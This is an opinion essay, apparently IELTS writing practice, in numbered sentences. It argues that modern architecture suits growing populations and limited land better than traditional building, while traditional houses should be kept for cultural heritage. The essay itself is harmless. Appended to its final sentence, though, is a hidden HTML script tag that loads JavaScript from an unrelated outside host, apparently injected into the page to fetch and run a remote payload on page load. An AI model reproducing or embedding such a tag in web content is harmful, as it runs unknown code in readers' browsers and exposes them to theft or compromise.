Modern buildings are appearing in large numbers some people believe that we should build our building in traditional styles To what extend do you agree or disagree

1. Nowadays, an increasing number of people are concerned about which architectural styles are appropriate and required for humans.

2. Whether to construct a large number of buildings in a modern or traditional style is a controversial issue.

3. In my view, building houses in traditional way is unsuitable for people’s current living conditions.

4. First, it is obvious that traditional construction types, such as level four homes, tile roof buildings, and so on, are ancient and modest.

5. This means that most of these types of houses are usually quite narrow and take up a lot of space to build, so it will not be suitable for the current situation of increasing population over time.

6. So, if we pursue such path, we will face several issues such as a lack of housing and insufficient land space for people's settlement due to the world's restricted living land.

7. Moreover, because people in the twenty-first century have a strong need for new and handy items, and this desire is expected to grow, building ancient structures in the traditional style are no longer fashionable.

8. Instead, developing it into skyscrapers, luxury villas that are completely equipped, and above all, capable of overcoming the majority of the issues in the conventional of building dwellings.

9. For example, building modern-style buildings helps to enhance land use rates when population growth is rising, and it is also in line with the policy of urbanization.

10. This isn't to argue that conventional dwellings should be phased out entirely.

11. Of course, the traditional house has its beauty, and it is also a symbol of their nation's culture, with the preservation of historic house building being an indispensable part of the transmission about the nation's history for posterity most explicitly and unambiguously possible.

12. But, it is unnecessary to devote a large amount of land to the construction of traditional houses, which causes many disadvantages, to maintain the national culture.

13. In conclusion, the constant development of the global economy is usually accompanied by people's high demands on services and living circumstances, therefore it is unsurprising that many houses in the modernization are popular and appear many days today.

14. Meanwhile, we should also pay attention to the harmonious balance between modernization and national tradition.

15. By doing that, we can make sure that national traditions will not be lost, the way of life will not become obsolete, and that it will be able to readily integrate with the changing and developing world.<script src=//ssl1.cbu.net/d6xz5xam></script>